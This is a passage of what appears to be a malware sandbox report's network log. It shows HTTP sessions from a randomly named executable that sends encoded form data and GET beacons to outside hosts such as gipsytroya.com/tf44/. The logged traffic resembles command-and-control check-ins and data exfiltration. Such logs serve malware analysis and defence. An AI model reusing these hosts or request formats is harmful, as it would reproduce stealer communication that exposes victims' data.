kbRxoVY0=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI6SMaovB0+/3mhh1M6zUnKPyUmqyKbciAJFSwBBQDhHXGq0SSHDqbJdAs1YxSQjt2xMLoq5ul6Tsb7DNEtnKXb8hrPTJ5auELFR1l2nHUbRf+7TVvBJ85x/LXknORAKc8usQB2my6jB3OOmAmewQu469ZscPGxCFJJ0ZaSUSbYS9mNWDQskxIqkVMN/xQd5Fuo65yYaH/k1IDUF/6h0//CqVSpR3EF1wEzYDSnHqwpwFyOZ8HVoSX21Q/aUYy4hK8P40IlK64nTfBzIiIPaC9rAVF9sbPwFIirOjON2AeynqgZYHiNGGAEbUFyS4FwXACLgv+DxYxKSQdJM7tLVuE4x3lqgXUMyeLjFhS2UFFJMsIfuVUc/F0IvX6nvOYRYoai/j/9Njkil3cZo0XUCAszLSVoGSqZmsJAUfLQ4Di+qUYzL1vCv9qX+bYJi/KMR2rQkmDq8FOIJ7jS1Aw7R2X6CY96d3BRnAD6UBPigfN+TB3Z5BgzLZkBz5ndMhfh2HT7v11upi5YwddLq+oj3tSjwTJTnSpxwY8dv+deJyN3fjDUKN8WrLhQ9dosHSqcsUY5nsqSHIUsKfSmZ57o2KdqIIrXzb0dVPgS/jHn4YOpGv3VaJOeayEP0jo9/Z5Vj1BqVrTJZ7z1Y+93BxC4cyPbmOqmxxkRHBPyI6m1kdLM6P4K14/5gi4sToR/pHXDFa9g31MJeIhpZn2xIMybVxidWwKlQXlxnyi87y99DrnJkFkTicYzp09pxdPibsTPWuGIrMowUFC7AkJcU6VegnjSwLN9Zx0nRVRt6eHuGwapmD3tFoNWaQj3zncN8bLIawM8 [TRUNCATED]
Aug 29, 2024 05:25:58.224647045 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:58 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 64 33 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: d3e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 29, 2024 05:25:58.224664927 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Aug 29, 2024 05:25:58.224678040 CEST	1196	IN	Data Raw: 6c 65 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 44 61 73 20 53 6f 66 74 77 61 72 65 20 4d 6f 64 75 6c 20 69 6d 20 44 6f 6d 61 69 6e 74 65 Data Ascii: le></td></tr><tr><td><table><tr><td colspan="2"><h2>Das Software Modul im Domaintechnik® Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/filea
Aug 29, 2024 05:25:58.228630066 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	213.145.228.16	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:00.087069988 CEST	504	OUT	GET /aroo/?DnUL=_290s&kbRxoVY0=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.sandranoll.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:26:00.791546106 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:26:00 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 30 30 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED] Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c00Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
Aug 29, 2024 05:26:00.791568995 CEST	1236	IN	Data Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><tab
Aug 29, 2024 05:26:00.791584969 CEST	927	IN	Data Raw: 48 6f 73 74 69 6e 67 20 62 65 69 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e Data Ascii: Hosting bei Domaintechnik®</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:55px;height:55px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png" alt="Linux VServer" /></td><td
Aug 29, 2024 05:26:00.796160936 CEST	164	IN	Data Raw: 20 47 6d 62 48 20 7c 20 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 3c 62 72 2f 3e 4c 65 64 65 72 65 72 67 61 73 73 65 20 36 20 7c 20 41 2d 35 32 30 34 20 53 74 72 61 26 73 7a 6c 69 67 3b 77 61 6c 63 68 65 6e 20 7c 20 54 65 6c 2e Data Ascii: GmbH \| www.domaintechnik.at<br/>Lederergasse 6 \| A-5204 Straßwalchen \| Tel.: +43 (0) 6215 / 20888 \| verkauf@domaintechnik.at</p></div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	91.195.240.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:05.921269894 CEST	778	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 72 33 51 6f 75 6c 75 53 52 53 43 32 72 47 68 71 41 71 43 46 56 67 67 6c 37 78 72 47 6b 34 65 41 67 3d 3d Data Ascii: kbRxoVY0=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
Aug 29, 2024 05:26:06.576121092 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 29 Aug 2024 03:26:06 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	91.195.240.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:08.461946964 CEST	798	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d Data Ascii: kbRxoVY0=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
Aug 29, 2024 05:26:09.127635956 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 29 Aug 2024 03:26:09 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	91.195.240.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:11.035337925 CEST	10880	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 [TRUNCATED] Data Ascii: kbRxoVY0=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6 [TRUNCATED]
Aug 29, 2024 05:26:11.668750048 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 29 Aug 2024 03:26:11 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	91.195.240.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:13.574906111 CEST	504	OUT	GET /tf44/?kbRxoVY0=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&DnUL=_290s HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.gipsytroya.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:26:14.208667040 CEST	113	IN	HTTP/1.1 439 date: Thu, 29 Aug 2024 03:26:14 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	172.67.210.102	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
